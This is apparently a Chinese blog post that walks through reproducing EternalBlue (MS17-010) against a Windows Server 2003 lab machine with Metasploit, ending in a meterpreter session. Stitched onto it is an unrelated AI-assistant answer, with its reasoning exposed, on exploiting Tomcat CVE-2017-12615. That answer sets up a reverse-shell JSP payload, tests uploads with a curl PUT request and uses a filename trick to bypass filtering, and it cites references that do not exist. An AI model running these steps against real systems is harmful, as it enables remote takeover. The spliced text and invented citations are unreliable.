CVE-2017-0144 “永恒之蓝” 漏洞复现

一.简介

CVE-2017-0144 即永恒之蓝,最早爆发于2017年4月14日晚,它是在Windows系统的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上获取了最高权限,可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二.环境准备

靶机:Windows Server 2003 

攻击机:Kali (自带 Metasploit)

三.复现过程

1. 关闭靶机的防火墙。(这里我的Windows版本可能跟你不同,但是位置一般差不多,在设置里搜索一下就可以找到)

2. 开启靶机的SMB服务(网上邻居 -> 属性)

点击 高级 -> 选择 高级设置 -> 开启 文件和打印机共享。(不同版本略有区别,一般都在 高级共享设置 里可以找到)

3. 开启 Kali ,输入命令 msfconsole ,启动 Metasploit 。

4.  输入命令,查看一下有关 永恒之蓝 漏洞的模块。

search ms17_010

有四个模块,前两个是漏洞利用模块,后两个是辅助模块,用于扫描漏洞。

5. 我们使用最后一个,先确定一下靶机是否存在永恒之蓝漏洞。

use auxiliary/scanner/smb/smb_ms17_010

6. 输入命令 options ,查看一下需要设置哪些参数,yes 表示需要我们自己设置,(有默认参数时可以不设置,也可以选择自己修改),no 表示不需要我们自己设置。

这里我们只需要设置 RHOSTS ,另外三个我们就不设置了,默认当前的设置就可以了。

7. RHOSTS 可以是一个确定的 ip 地址,也可以是一个 ip 地址的范围,如果确定了靶机的 ip 地址,就直接扫描一个确定的地址就可以了。

首先,在靶机上看一下 ip 地址是多少,输入命令 ipconfig 。

然后,就开始设置,在 Kali 上输入命令设置 RHOSTS 参数。

set rhosts 靶机的ip地址

8. 输入 run ,开始扫描。(有绿色标识符就说明有这个漏洞可以利用)

9. 进入漏洞利用模块,也就是刚刚搜索出来的四个模块,我们先用第一个模块来试试。

use exploit/windows/smb/ms17_010_eternalblue

然后 查看参数。

10. 这里跟上面一样,只需要设置 RHOSTS 。

11. 输入 run 。发现型号不匹配,没关系,换第二个模块。

12. 操作同上。到此为止,我们就拿到 meterpreter ,说明漏洞利用成功了。

13. 我们已经控制了靶机,接着就可以执行我们想要的任何命令了。

<think>好的,我现在需要帮用户查找关于如何使用Metasploit Framework(MSF)对CVE-2017-12615漏洞进行渗透测试的方法。首先,我需要确认CVE-2017-12615是什么漏洞。根据记忆,这是一个Apache Tomcat的远程代码执行漏洞,影响版本是Tomcat 7.0.0到7.0.79,当启用HTTP PUT方法时,攻击者可以上传恶意JSP文件,导致远程代码执行。 接下来,用户需要的是利用MSF进行攻击的教程。我记得MSF中有现成的模块可以用来利用这个漏洞。可能需要查找对应的模块名称,比如exploit/multi/http/tomcat_jsp_upload_bypass。然后,用户需要知道如何配置参数,比如设置RHOSTS(目标IP)、RPORT(端口,默认8080)、TARGETURI(路径),以及上传的JSP payload。 另外,用户可能需要生成payload,比如使用msfvenom生成反向shell的JSP文件,或者直接使用MSF内置的payload。需要确保用户了解如何设置监听器,处理防火墙或杀毒软件的问题,以及漏洞利用的前提条件,比如目标服务器是否启用了PUT方法,是否有写权限等。 还需要注意引用相关的资料,比如用户提供的引用中有提到其他CVE复现,虽然没有直接提到CVE-2017-12615,但可以类比说明使用MSF的一般步骤。例如,引用[1]提到使用模块路径,引用[3]提到MSF的模块使用和启动方式,这些都可以作为参考。 此外,用户可能需要了解如何验证漏洞是否存在,比如手动发送PUT请求测试,或者使用nmap脚本检测。最后,提醒用户遵守法律,仅在授权环境下进行测试,并建议修复方案,比如升级Tomcat版本或禁用PUT方法。 现在需要将这些步骤结构化,用中文清晰回答,确保LaTeX格式正确,生成相关问题,并在适当位置添加引用标记。同时检查是否有遗漏的细节,比如模块的具体配置步骤,常见错误处理等,确保回答准确可靠。</think>### 使用Metasploit Framework (MSF) 对CVE-2017-12615漏洞的渗透测试方法 CVE-2017-12615是Apache Tomcat的一个远程代码执行漏洞,影响Tomcat 7.0.0至7.0.79版本。当服务器配置允许HTTP PUT方法时,攻击者可通过上传恶意JSP文件实现代码执行[^1]。 #### 步骤说明 1. **环境准备** - 确保已安装Metasploit Framework(建议使用Kali Linux或最新版MSF)。 - 启动MSF数据库服务: ```bash msfdb init && msfdb start ``` 2. **查找并加载漏洞模块** ```bash msf6 > search CVE-2017-12615 msf6 > use exploit/multi/http/tomcat_jsp_upload_bypass ``` 3. **配置参数** ```bash msf6 exploit(tomcat_jsp_upload_bypass) > set RHOSTS <目标IP> msf6 exploit(tomcat_jsp_upload_bypass) > set RPORT 8080 # Tomcat默认端口 msf6 exploit(tomcat_jsp_upload_bypass) > set TARGETURI / # 目标路径 msf6 exploit(tomcat_jsp_upload_bypass) > set HttpUsername <用户名> # 若需认证 msf6 exploit(tomcat_jsp_upload_bypass) > set HttpPassword <密码> ``` 4. **选择Payload** ```bash msf6 exploit(tomcat_jsp_upload_bypass) > set payload java/jsp_shell_reverse_tcp msf6 exploit(tomcat_jsp_upload_bypass) > set LHOST <攻击机IP> msf6 exploit(tomcat_jsp_upload_bypass) > set LPORT 4444 ``` 5. **执行攻击** ```bash msf6 exploit(tomcat_jsp_upload_bypass) > exploit ``` #### 关键注意事项 - **漏洞验证**:手动发送PUT请求测试是否允许上传文件: ```bash curl -X PUT http://<目标IP>:8080/test.txt -d "test" ``` - **绕过限制**:通过构造特殊文件名(如`shell.jsp%20`)绕过Tomcat的防护机制。 - **防护措施**:升级Tomcat至7.0.80+或禁用PUT方法(修改`web.xml`配置)[^3]。 #### 引用说明 - 漏洞利用模块路径参考了Metasploit模块管理逻辑[^1]。 - 监听器配置与Payload生成方法类似CVE-2017-8759的HTA脚本利用流程[^2]。 - MSF基础操作(如模块加载、参数设置)参考了永恒之蓝漏洞复现步骤[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值